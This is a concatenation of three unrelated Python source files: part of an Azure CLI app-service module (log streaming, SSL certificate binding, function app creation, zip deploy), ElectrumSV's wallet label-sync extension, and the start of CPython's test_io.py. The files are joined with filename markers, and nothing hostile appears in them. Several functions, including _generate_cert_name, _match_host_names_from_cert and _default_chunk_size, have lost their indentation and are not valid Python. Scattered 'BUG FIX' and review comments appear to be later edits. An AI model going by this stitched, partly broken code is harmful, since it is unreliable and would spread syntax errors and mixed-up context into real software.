    poller = client.web_apps.list_publishing_credentials(resource_group_name, name)
    creds = poller.result()
    return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
    """Fetch a log endpoint with basic auth.

    When *log_file* is given the body is saved to that file in 1 KiB chunks;
    otherwise the response is streamed line-by-line to stdout until the server
    closes the connection. Raises CLIError on any non-200 response.
    """
    import sys
    import certifi
    import urllib3
    try:
        # Optional: route urllib3's TLS through pyOpenSSL when it is installed.
        import urllib3.contrib.pyopenssl
        urllib3.contrib.pyopenssl.inject_into_urllib3()
    except ImportError:
        pass
    std_encoding = sys.stdout.encoding
    http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
    headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    # preload_content=False keeps the body unconsumed so it can be streamed below.
    r = http.request(
        'GET',
        url,
        headers=headers,
        preload_content=False
    )
    if r.status != 200:
        raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
            url, r.status, r.reason))
    if log_file:  # download logs
        with open(log_file, 'wb') as f:
            while True:
                data = r.read(1024)
                if not data:
                    break
                f.write(data)
    else:  # streaming
        for chunk in r.stream():
            if chunk:
                # Extra encode()/decode() round-trip for a stdout whose encoding
                # does not support 'utf-8'; unmappable characters are replaced.
                print(chunk.decode(encoding='utf-8', errors='replace')
                      .encode(std_encoding, errors='replace')
                      .decode(std_encoding, errors='replace'), end='')  # each line of log has CRLF.
    r.release_conn()
def upload_ssl_cert(resource_group_name, name, certificate_password, certificate_file):
    """Upload a .pfx certificate for a web app.

    The certificate is stored in the resource group of the app's service plan,
    under a deterministic name derived from the cert's thumbprint.
    """
    client = web_client_factory()
    webapp = _generic_site_operation(resource_group_name, name, 'get')
    cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
    # Close the file deterministically instead of leaking the handle.
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
    hosting_environment_profile_param = webapp.hosting_environment_profile
    if hosting_environment_profile_param is None:
        hosting_environment_profile_param = ""
    thumb_print = _get_cert(certificate_password, certificate_file)
    cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
                                    webapp.location, cert_resource_group_name)
    cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
                       location=webapp.location)
    return client.certificates.create_or_update(cert_resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
    """Decrypt the .pfx file and return the cert's SHA1 thumbprint (hex, no colons)."""
    # Read via a context manager rather than open(...).read(), which leaked the handle.
    with open(certificate_file, 'rb') as f:
        pfx_data = f.read()
    p12 = OpenSSL.crypto.load_pkcs12(pfx_data, certificate_password)
    cert = p12.get_certificate()
    digest_algorithm = 'sha1'
    thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
    return thumbprint
def list_ssl_certs(resource_group_name):
    """List all certificates uploaded to the resource group."""
    return web_client_factory().certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(resource_group_name, certificate_thumbprint):
    """Delete the certificate in the group matching *certificate_thumbprint*."""
    client = web_client_factory()
    for cert in client.certificates.list_by_resource_group(resource_group_name):
        if cert.thumbprint == certificate_thumbprint:
            return client.certificates.delete(resource_group_name, cert.name)
    raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def _update_host_name_ssl_state(resource_group_name, webapp_name, location,
                                host_name, ssl_state, thumbprint, slot=None):
    """Apply a single host name's SSL binding state via create_or_update."""
    ssl_binding = HostNameSslState(name=host_name,
                                   ssl_state=ssl_state,
                                   thumbprint=thumbprint,
                                   to_update=True)
    updated_webapp = Site(host_name_ssl_states=[ssl_binding], location=location)
    # '_generic_site_operation' resolves slot operations from 'webapp(slot)' names.
    name = '{}({})'.format(webapp_name, slot) if slot else webapp_name
    return _generic_site_operation(resource_group_name, name, 'create_or_update',
                                   slot, updated_webapp)
def _update_ssl_binding(resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Bind/unbind the certificate with the given thumbprint to matching host names."""
    client = web_client_factory()
    webapp = client.web_apps.get(resource_group_name, name)
    cert_group = parse_resource_id(webapp.server_farm_id)['resource_group']
    for cert in client.certificates.list_by_resource_group(cert_group):
        if cert.thumbprint != certificate_thumbprint:
            continue
        # Fast path: a single, non-wildcard host name on the certificate.
        if len(cert.host_names) == 1 and not cert.host_names[0].startswith('*'):
            return _update_host_name_ssl_state(resource_group_name, name, webapp.location,
                                               cert.host_names[0], ssl_type,
                                               certificate_thumbprint, slot)
        # Otherwise match (possibly wildcard) cert host names against the app's own.
        hostnames_in_webapp = [x.name.split('/')[-1]
                               for x in list_hostnames(resource_group_name, name, slot)]
        for matched in _match_host_names_from_cert(cert.host_names, hostnames_in_webapp):
            _update_host_name_ssl_state(resource_group_name, name, webapp.location,
                                        matched, ssl_type, certificate_thumbprint, slot)
        return show_webapp(resource_group_name, name, slot)
    raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Bind an uploaded certificate using SNI or IP-based SSL."""
    state = SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled
    return _update_ssl_binding(resource_group_name, name, certificate_thumbprint, state, slot)
def unbind_ssl_cert(resource_group_name, name, certificate_thumbprint, slot=None):
    """Disable the SSL binding for the given certificate thumbprint."""
    return _update_ssl_binding(resource_group_name, name, certificate_thumbprint,
                               SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# helper class: handles runtime stacks given in a format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
    """Resolves runtime stack display names (e.g. 'node|6.1') to site settings."""
    def __init__(self, client):
        self._client = client
        # Lazily populated list of stack dicts; see _load_stacks().
        self._stacks = []
    def resolve(self, display_name):
        """Return the stack whose displayName matches (case-insensitive), or None."""
        self._load_stacks()
        return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
                    None)
    @property
    def stacks(self):
        """All known stacks, loading them on first access."""
        self._load_stacks()
        return self._stacks
    @staticmethod
    def update_site_config(stack, site_config):
        """Apply the stack's configs as attributes on site_config."""
        for k, v in stack['configs'].items():
            setattr(site_config, k, v)
        return site_config
    @staticmethod
    def update_site_appsettings(stack, site_config):
        """Apply the stack's configs as app settings (used for 'node' stacks)."""
        if site_config.app_settings is None:
            site_config.app_settings = []
        site_config.app_settings += [NameValuePair(k, v) for k, v in stack['configs'].items()]
        return site_config
    def _load_stacks(self):
        """Fetch available stacks from the service and cache them (runs once)."""
        if self._stacks:
            return
        raw_list = self._client.provider.get_available_stacks()
        stacks = raw_list['value']
        # Maps a stack name to the site-config field / app-setting it controls.
        config_mappings = {
            'node': 'WEBSITE_NODE_DEFAULT_VERSION',
            'python': 'python_version',
            'php': 'php_version',
            'aspnet': 'net_framework_version'
        }
        result = []
        # get all stack version except 'java'
        for name, properties in [(s['name'], s['properties']) for s in stacks
                                 if s['name'] in config_mappings]:
            for major in properties['majorVersions']:
                # Prefer the minor version flagged as default, else the major's own.
                default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
                                     None)
                result.append({
                    'displayName': name + '|' + major['displayVersion'],
                    'configs': {
                        config_mappings[name]: (default_minor['runtimeVersion']
                                                if default_minor else major['runtimeVersion'])
                    }
                })
        # deal with java, which pairs with java container version
        java_stack = next((s for s in stacks if s['name'] == 'java'))
        java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
        for java_version in java_stack['properties']['majorVersions']:
            for fx in java_container_stack['properties']['frameworks']:
                for fx_version in fx['majorVersions']:
                    result.append({
                        'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
                                                              fx['display'],
                                                              fx_version['displayVersion']),
                        'configs': {
                            'java_version': java_version['runtimeVersion'],
                            'java_container': fx['name'],
                            'java_container_version': fx_version['runtimeVersion']
                        }
                    })
        # 'node' stacks configure via app settings; everything else via site config.
        for r in result:
            r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
                           r['displayName'] else _StackRuntimeHelper.update_site_config)
        self._stacks = result
def create_function(resource_group_name, name, storage_account, plan=None,
                    consumption_plan_location=None, deployment_source_url=None,
                    deployment_source_branch='master', deployment_local_git=None,
                    deployment_container_image_name=None):
    """Create a function app on either a dedicated plan or a consumption plan.

    Exactly one of *plan* (name or resource id) or *consumption_plan_location*
    must be supplied; *deployment_source_url* and *deployment_local_git* are
    mutually exclusive. Returns the created function app resource.
    """
    if deployment_source_url and deployment_local_git:
        raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
    if bool(plan) == bool(consumption_plan_location):
        raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
    site_config = SiteConfig(app_settings=[])
    functionapp_def = Site(location=None, site_config=site_config)
    client = web_client_factory()
    if consumption_plan_location:
        # Validate against the locations that support the Dynamic SKU.
        locations = list_consumption_locations()
        location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
        if location is None:
            raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
        functionapp_def.location = consumption_plan_location
        functionapp_def.kind = 'functionapp'
    else:
        if is_valid_resource_id(plan):
            plan = parse_resource_id(plan)['name']
        plan_info = client.app_service_plans.get(resource_group_name, plan)
        location = plan_info.location
        # A 'reserved' plan indicates Linux.
        is_linux = plan_info.reserved
        if is_linux:
            functionapp_def.kind = 'functionapp,linux'
            site_config.app_settings.append(NameValuePair('FUNCTIONS_EXTENSION_VERSION', 'beta'))
            site_config.app_settings.append(NameValuePair('MACHINEKEY_DecryptionKey',
                                                          str(hexlify(urandom(32)).decode()).upper()))
            if deployment_container_image_name:
                # Custom container: run the supplied image, read-only edit mode.
                site_config.app_settings.append(NameValuePair('DOCKER_CUSTOM_IMAGE_NAME',
                                                              deployment_container_image_name))
                site_config.app_settings.append(NameValuePair('FUNCTION_APP_EDIT_MODE', 'readOnly'))
                site_config.app_settings.append(NameValuePair('WEBSITES_ENABLE_APP_SERVICE_STORAGE', 'false'))
            else:
                # No custom image: use the built-in functions runtime container.
                site_config.app_settings.append(NameValuePair('WEBSITES_ENABLE_APP_SERVICE_STORAGE', 'true'))
                site_config.linux_fx_version = 'DOCKER|appsvc/azure-functions-runtime'
        else:
            functionapp_def.kind = 'functionapp'
            site_config.app_settings.append(NameValuePair('FUNCTIONS_EXTENSION_VERSION', '~1'))
        functionapp_def.server_farm_id = plan
        functionapp_def.location = location
    con_string = _validate_and_get_connection_string(resource_group_name, storage_account)
    # adding appsetting to site to make it a function
    site_config.app_settings.append(NameValuePair('AzureWebJobsStorage', con_string))
    site_config.app_settings.append(NameValuePair('AzureWebJobsDashboard', con_string))
    site_config.app_settings.append(NameValuePair('WEBSITE_NODE_DEFAULT_VERSION', '6.5.0'))
    if consumption_plan_location is None:
        site_config.always_on = True
    else:
        # Consumption plan: content lives in an Azure Files share on the storage account.
        site_config.app_settings.append(NameValuePair('WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
                                                      con_string))
        site_config.app_settings.append(NameValuePair('WEBSITE_CONTENTSHARE', name.lower()))
    poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
    functionapp = LongRunningOperation()(poller)
    _set_remote_or_local_git(functionapp, resource_group_name, name, deployment_source_url,
                             deployment_source_branch, deployment_local_git)
    return functionapp
def _set_remote_or_local_git(webapp, resource_group_name, name, deployment_source_url=None,
                             deployment_source_branch='master', deployment_local_git=None):
    """Configure either a remote git source or local git deployment for the app.

    A failed remote-git link is logged as a warning, not raised, so app
    creation still succeeds. When local git is enabled the clone URL is
    attached to *webapp* as 'deploymentLocalGitUrl'.
    """
    if deployment_source_url:
        logger.warning("Linking to git repository '%s'", deployment_source_url)
        try:
            config_source_control(resource_group_name, name, deployment_source_url, 'git',
                                  deployment_source_branch, manual_integration=True)
        except Exception as ex:  # pylint: disable=broad-except
            # Translate to a CLI-friendly error but carry on (best effort).
            ex = ex_handler_factory(no_throw=True)(ex)
            logger.warning("Link to git repository failed due to error '%s'", ex)
    if deployment_local_git:
        local_git_info = enable_local_git(resource_group_name, name)
        logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
        setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(resource_group_name, storage_account):
    """Validate a storage account and build its connection string.

    *storage_account* may be a plain name (assumed to live in
    *resource_group_name*) or a full resource id, in which case its own
    resource group is used. Raises CLIError when the account lacks blob,
    queue, or table endpoints or has a disallowed SKU.
    """
    from azure.cli.core._profile import CLOUD
    sa_resource_group = resource_group_name
    if is_valid_resource_id(storage_account):
        sa_resource_group = parse_resource_id(storage_account)['resource_group']
        storage_account = parse_resource_id(storage_account)['name']
    storage_client = get_mgmt_service_client(StorageManagementClient)
    storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
                                                                        storage_account)
    error_message = ''
    endpoints = storage_properties.primary_endpoints
    sku = storage_properties.sku.name.value
    allowed_storage_types = ['Standard_GRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
    for e in ['blob', 'queue', 'table']:
        if not getattr(endpoints, e, None):
            # BUG FIX: the account name and the endpoint kind were swapped in the message.
            error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e)  # pylint: disable=line-too-long
    if sku not in allowed_storage_types:
        error_message += 'Storage type {} is not allowed'.format(sku)
    if error_message:
        raise CLIError(error_message)
    # BUG FIX: use the storage account's own resource group, which may differ
    # from the function app's group when a resource id was supplied.
    obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account)  # pylint: disable=no-member
    try:
        keys = [obj.keys[0].value, obj.keys[1].value]  # pylint: disable=no-member
    except AttributeError:
        # Older API versions have a slightly different structure
        keys = [obj.key1, obj.key2]  # pylint: disable=no-member
    endpoint_suffix = CLOUD.suffixes.storage_endpoint
    connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
        "https",
        endpoint_suffix,
        storage_account,
        keys[0])  # pylint: disable=no-member
    return connection_string
def list_consumption_locations():
    """Return normalized names of regions supporting consumption (Dynamic SKU) plans."""
    client = web_client_factory()
    return [{'name': region.name.lower().replace(" ", "")}
            for region in client.list_geo_regions(sku='Dynamic')]
def enable_zip_deploy(resource_group_name, name, src, slot=None):
    """Deploy a local zip package to the site through the Kudu zipdeploy API."""
    import os
    import requests
    import urllib3
    client = web_client_factory()
    user_name, password = _get_site_credential(client, resource_group_name, name)
    scm_url = _get_scm_url(resource_group_name, name, slot)
    zip_url = scm_url + '/api/zipdeploy'
    authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    # NOTE: 'headers' aliases 'authorization', so both requests carry the same headers.
    headers = authorization
    headers['content-type'] = 'application/octet-stream'
    # Read the package content from disk.
    with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
        zip_content = fs.read()
    upload = requests.post(zip_url, data=zip_content, headers=headers)
    if upload.status_code != 200:
        raise CLIError("Zip deployment {} failed with status code '{}' and reason '{}'".format(
            zip_url, upload.status_code, upload.text))
    # on successful deployment navigate to the app, display the latest deployment json response
    latest = requests.get(scm_url + '/api/deployments/latest', headers=authorization)
    return latest.json()
|
label_sync.py | # ElectrumSV - lightweight Bitcoin client
# Copyright (C) 2014 Thomas Voegtlin
# Copyright (C) 2019-2020 The ElectrumSV Developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import base64
from functools import partial
import json
import hashlib
import os
import requests
import threading
from typing import Any, Optional
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QFileDialog, QMessageBox, QPushButton, QVBoxLayout
from electrumsv.app_state import app_state
from electrumsv.crypto import aes_decrypt_with_iv, aes_encrypt_with_iv
from electrumsv.exceptions import UserCancelled
from electrumsv.extensions import label_sync
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.wallet import AbstractAccount, Wallet
from .util import (Buttons, EnterButton, FormSectionWidget, FramedTextWidget, OkButton,
WindowModalDialog)
logger = logs.get_logger("labels")
# Label sync only currently works for addresses and transactions. It needs several pieces of
# work before it can be re-enabled:
# - Labels are now only tracked for keys and transactions that exist. This means that if someone
# does a sync, unlike before where there was a dictionary that was not required to map to
# existing entries, any entries that are for unknown entries will be lost without special
# handling.
# - Addresses cannot be mapped to keys, unless we enumerate all existing keys. Any labels for
# addresses we cannot find through enumeration, will similarly be lost without special handling.
# If we modify this to take labels from keys, the code should perhaps instead map the label
# to the masterkey fingerprint combined with the derivation path. However, this still leaves
# room for the presence of unsynced keys.
# - There is no per-account storage for "wallet_nonce" to be get/set from/to.
# TODO: Need to fix `set_transaction_label` before this can work again as well, work grows.
DISABLE_INTEGRATION = True
class LabelSync(object):
    """Synchronises wallet labels with the labels.electrum.org service.

    Most synchronisation is currently disabled (see DISABLE_INTEGRATION);
    downloading and exporting existing labels remains supported.
    """

    def __init__(self):
        self.target_host = 'labels.electrum.org'
        # account -> (encryption password, AES IV, remote wallet id)
        self._accounts = {}
        app_state.app.window_opened_signal.connect(self.window_opened)
        app_state.app.window_closed_signal.connect(self.window_closed)

    def encode(self, account: AbstractAccount, msg) -> str:
        """Encrypt *msg* with the account's key and return it base64-encoded."""
        password, iv, account_id = self._accounts[account]
        encrypted = aes_encrypt_with_iv(password, iv, msg.encode('utf8'))
        return base64.b64encode(encrypted).decode()

    def decode(self, account: AbstractAccount, message) -> str:
        """Reverse of encode(): base64-decode, then decrypt with the account key."""
        password, iv, wallet_id = self._accounts[account]
        decoded = base64.b64decode(message)
        decrypted = aes_decrypt_with_iv(password, iv, decoded)
        return decrypted.decode('utf8')

    def get_nonce(self, account: AbstractAccount) -> int:
        """Return the nonce to be used with the next change for *account*."""
        if DISABLE_INTEGRATION:
            return 1
        # TODO BACKLOG there is no working account get/set
        nonce = account.get('wallet_nonce', None)
        if nonce is None:
            nonce = 1
            self.set_nonce(account, nonce)
        return nonce

    def set_nonce(self, account: AbstractAccount, nonce: int) -> None:
        """Persist the next-change nonce for *account*."""
        logger.debug("set {} nonce to {}".format(account.name(), nonce))
        # TODO BACKLOG there is no working account get/set
        account.put("wallet_nonce", nonce)

    def set_transaction_label(self, wallet: Wallet, tx_hash: bytes, text: Optional[str]) -> None:
        """Record a transaction label remotely (currently disabled)."""
        if DISABLE_INTEGRATION:
            return
        raise NotImplementedError("Transaction labels not supported")
        # label_key = tx_hash
        # assert label_key != tx_hash, "Label sync transaction support not implemented"
        # # label_key = "tx:"+ hash_to_hex_str(tx_hash)
        # self._set_label(account, label_key, text)

    def set_keyinstance_label(self, account: AbstractAccount, key_id: int, text: str) -> None:
        """Record a key instance label remotely (currently disabled)."""
        if DISABLE_INTEGRATION:
            return
        # TODO(rt12) BACKLOG if this is going to be made to work, it needs to fetch the
        # fingerprint and derivation data, or something equivalent.
        label_key = key_id  # "key:"+ key_id
        assert label_key != key_id, "Label sync key instance support not implemented"
        self._set_label(account, label_key, text)

    def _set_label(self, account: AbstractAccount, item, label) -> None:
        """Encrypt and asynchronously push one label for *item* to the server."""
        if account not in self._accounts:
            return
        if not item:
            return
        nonce = self.get_nonce(account)
        wallet_id = self._accounts[account][2]
        bundle = {"walletId": wallet_id,
                  "walletNonce": nonce,
                  "externalId": self.encode(account, item),
                  "encryptedLabel": self.encode(account, label)}
        t = threading.Thread(target=self.do_request_safe,
                             args=["POST", "/label", False, bundle])
        t.daemon = True  # setDaemon() is deprecated since Python 3.10
        t.start()
        # Caller will write the wallet
        self.set_nonce(account, nonce + 1)

    def do_request(self, method, url="/labels", is_batch=False, data=None):
        """Issue an HTTP request against the label server and return parsed JSON.

        Raises on non-200 responses and on server-reported errors.
        """
        url = 'https://' + self.target_host + url
        kwargs = {'headers': {}}
        if method == 'GET' and data:
            kwargs['params'] = data
        elif method == 'POST' and data:
            kwargs['data'] = json.dumps(data)
            kwargs['headers']['Content-Type'] = 'application/json'
        response = requests.request(method, url, **kwargs)
        if response.status_code != 200:
            raise Exception(response.status_code, response.text)
        response = response.json()
        if "error" in response:
            raise Exception(response["error"])
        return response

    def do_request_safe(self, *args, **kwargs):
        """do_request() wrapper that logs instead of propagating errors."""
        try:
            self.do_request(*args, **kwargs)
        except Exception:
            logger.exception('requesting labels')

    def push_thread(self, account) -> None:
        """Upload all of an account's labels to the server (blocking)."""
        assert not DISABLE_INTEGRATION
        account_data = self._accounts.get(account, None)
        if not account_data:
            raise Exception('Account {} not loaded'.format(account))
        wallet_id = account_data[2]
        bundle = {"labels": [],
                  "walletId": wallet_id,
                  "walletNonce": self.get_nonce(account)}
        # TODO(rt12) BACKLOG there is no account.labels any more. It needs to iterate over
        # transaction and keyinstance labels.
        for key, value in account.labels.items():
            try:
                encoded_key = self.encode(account, key)
                encoded_value = self.encode(account, value)
            except Exception:
                logger.error('cannot encode %r %r', key, value)
                continue
            bundle["labels"].append({'encryptedLabel': encoded_value,
                                     'externalId': encoded_key})
        self.do_request("POST", "/labels", True, bundle)

    def pull_thread(self, account: AbstractAccount, force: bool) -> Optional[Any]:
        """Fetch labels newer than the account nonce; returns the updates dict
        while integration is disabled, otherwise applies them to the account."""
        account_data = self._accounts.get(account, None)
        if not account_data:
            raise Exception('Account {} not loaded'.format(account))
        wallet_id = account_data[2]
        # force=True re-downloads everything from the beginning.
        nonce = 1 if force else self.get_nonce(account) - 1
        logger.debug(f"asking for labels since nonce {nonce}")
        response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id)))
        if response["labels"] is None:
            logger.debug('no new labels')
            return
        result = {}
        for label in response["labels"]:
            try:
                key = self.decode(account, label["externalId"])
                value = self.decode(account, label["encryptedLabel"])
            except Exception:
                # Undecryptable entries (e.g. from other clients) are skipped.
                continue
            try:
                json.dumps(key)
                json.dumps(value)
            except Exception:
                logger.error(f'no json {key}')
                continue
            result[key] = value
        logger.info(f"received {len(result):,d} labels")
        updates = {}
        for key, value in result.items():
            # TODO(rt12) BACKLOG there is no account.labels any more.
            if force or not account.labels.get(key):
                updates[key] = value
        if DISABLE_INTEGRATION:
            return updates
        if len(updates):
            # TODO(rt12) BACKLOG there is no account.put or account storage at this time, or
            # even `account.labels`.
            account.labels.update(updates)
            # do not write to disk because we're in a daemon thread. The handed off writing to
            # the sqlite writer thread would achieve this.
            account.put('labels', account.labels)
        self.set_nonce(account, response["nonce"] + 1)
        self.on_pulled(account, updates)

    def pull_thread_safe(self, account: AbstractAccount, force: bool) -> None:
        """pull_thread() wrapper that logs instead of propagating errors."""
        try:
            self.pull_thread(account, force)
        except Exception:
            logger.exception('could not retrieve labels')

    def start_account(self, account: AbstractAccount) -> None:
        """Derive the per-account encryption key and ids, then begin syncing."""
        nonce = self.get_nonce(account)
        logger.debug("Account %s nonce is %s", account.name(), nonce)
        mpk = ''.join(sorted(account.get_master_public_keys()))
        if not mpk:
            return
        mpk = mpk.encode('ascii')
        password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
        iv = hashlib.sha256(password).digest()[:16]
        wallet_id = hashlib.sha256(mpk).hexdigest()
        self._accounts[account] = (password, iv, wallet_id)
        if DISABLE_INTEGRATION:
            return
        # If there is an auth token we can try to actually start syncing
        t = threading.Thread(target=self.pull_thread_safe, args=(account, False))
        t.daemon = True  # setDaemon() is deprecated since Python 3.10
        t.start()

    def stop_account(self, account: AbstractAccount) -> None:
        """Forget the per-account sync state."""
        self._accounts.pop(account, None)

    def on_enabled_changed(self) -> None:
        """React to the extension being toggled by (de)registering all windows."""
        if label_sync.is_enabled():
            for window in app_state.app.windows:
                self.window_opened(window)
        else:
            for window in app_state.app.windows:
                self.window_closed(window)

    def window_opened(self, window):
        """Start syncing every account of a newly opened wallet window."""
        if label_sync.is_enabled():
            app_state.app.labels_changed_signal.connect(window.update_tabs)
            for account in window._wallet.get_accounts():
                self.start_account(account)

    def window_closed(self, window):
        """Stop syncing every account of a closed wallet window."""
        for account in window._wallet.get_accounts():
            self.stop_account(account)

    def settings_widget(self, *args):
        """Return the button shown in the extension's settings row."""
        return EnterButton(_('Export'), partial(self.settings_dialog, *args))

    def threaded_button(self, text, dialog, func, *args):
        """Create a QPushButton that runs *func* on a worker thread when clicked."""
        def on_clicked(_checked):
            self.run_in_thread(dialog, button, func, *args)
        button = QPushButton(text)
        button.clicked.connect(on_clicked)
        return button

    def settings_dialog(self, prefs_window, account: AbstractAccount):
        """Show the label sync settings/export dialog for *account*."""
        d = WindowModalDialog(prefs_window, _("Label Settings"))
        form = FormSectionWidget()
        form.add_title(_("Label sync options"))
        if not DISABLE_INTEGRATION:
            upload = self.threaded_button("Force upload", d, self.push_thread, account)
            form.add_row(_("Upload labels"), upload)
        download = self.threaded_button("Force download", d, self.pull_thread, account, True)
        form.add_row(_("Export labels"), download)
        label = FramedTextWidget(_("The label sync services are no longer supported. However, "
            "ElectrumSV will still allow users to download and export their existing labels. These "
            "exported label files can then be imported, and any entries they have which can be "
            "matched to wallet contents may be added to the appropriate record."))
        vbox = QVBoxLayout(d)
        vbox.addWidget(label)
        vbox.addWidget(form)
        vbox.addSpacing(20)
        vbox.addLayout(Buttons(OkButton(d)))
        return bool(d.exec_())

    def on_pulled(self, account: AbstractAccount, updates: Any) -> None:
        """Notify the UI that labels changed for *account*."""
        app_state.app.labels_changed_signal.emit(account._wallet.get_storage_path(),
                                                 account.get_id(), updates)

    def on_exception(self, dialog, exception):
        """Show a modal warning for unexpected errors; user cancels are silent."""
        if not isinstance(exception, UserCancelled):
            logger.exception("")
            # NOTE(review): 'dialog' is passed where QMessageBox expects the title
            # string — verify the intended argument order against the Qt API.
            d = QMessageBox(QMessageBox.Warning, dialog, _('Error'), str(exception))
            d.setWindowModality(Qt.WindowModal)
            d.exec_()

    def run_in_thread(self, dialog, button, func, *args) -> Any:
        """Run *func* on the app thread pool, re-enabling *button* when done.

        While integration is disabled the result is treated as exported label
        data and the user is offered a file-save dialog for it.
        """
        def on_done(future):
            button.setEnabled(True)
            try:
                data = future.result()
            except Exception as exc:
                self.on_exception(dialog, exc)
            else:
                if DISABLE_INTEGRATION:
                    if data is None:
                        dialog.show_message(_("No labels were present."))
                    else:
                        filename = 'electrumsv_labelsync_labels.json'
                        directory = os.path.expanduser('~')
                        path = os.path.join(directory, filename)
                        filename, __ = QFileDialog.getSaveFileName(dialog,
                            _('Enter a filename for the copy of your labels'), path, "*.json")
                        if not filename:
                            return
                        json_text = json.dumps(data)
                        with open(filename, "w") as f:
                            f.write(json_text)
                else:
                    dialog.show_message(_("Your labels have been synchronised."))
        button.setEnabled(False)
        app_state.app.run_in_thread(func, *args, on_done=on_done)
|
test_io.py | """Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.script_helper import assert_python_ok
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
    """A RawIO implementation without read(), so as to exercise the default
    RawIO.read() which calls readinto()."""
    def __init__(self, read_stack=()):
        # Chunks handed out by successive readinto() calls, in order.
        self._read_stack = list(read_stack)
        # Everything passed to write(), recorded for later inspection by tests.
        self._write_stack = []
        self._reads = 0
        # Counts reads attempted after the read stack was exhausted.
        self._extraneous_reads = 0
    def write(self, b):
        self._write_stack.append(bytes(b))
        return len(b)
    def writable(self):
        return True
    def fileno(self):
        return 42
    def readable(self):
        return True
    def seekable(self):
        return True
    def seek(self, pos, whence):
        return 0 # wrong but we gotta return something
    def tell(self):
        return 0 # same comment as above
